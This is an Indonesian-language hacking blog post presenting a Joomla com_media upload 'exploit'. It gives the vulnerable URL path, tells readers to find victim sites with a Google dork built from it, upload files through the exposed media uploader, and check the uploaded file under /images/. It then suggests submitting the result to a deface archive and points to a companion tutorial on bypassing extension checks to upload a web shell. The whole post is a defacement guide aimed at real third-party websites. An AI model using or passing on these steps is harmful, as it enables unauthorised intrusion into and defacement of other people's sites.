com_media
tkjcyber id 00:24
Exploit: /index.php?
option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asse
t=com_content&author=&folder=
Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas,
dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang fresh
and Verawan.
target.co.li/index.php?
option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articlet
ext&asset=com_content&author=&folder=
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
Nah, untuk melihat hasil file yang sudah kita upload di sini: target.co.li/images/file
cth: http://target.co.li/images/nuenomaru.txt
Done
lihat hasil file yang sudah saya upload tadi, tinggal Submit aja di deface archiver
Ouh iya utk Cara Upload Shell nya silahkan Baca artikel Kami yang iniii yoo: Tutorial
Upload Shell di eXploit com_media dengan Cara Bypass ekstensi Shell
Semoga bermanfaat
Poc : com_media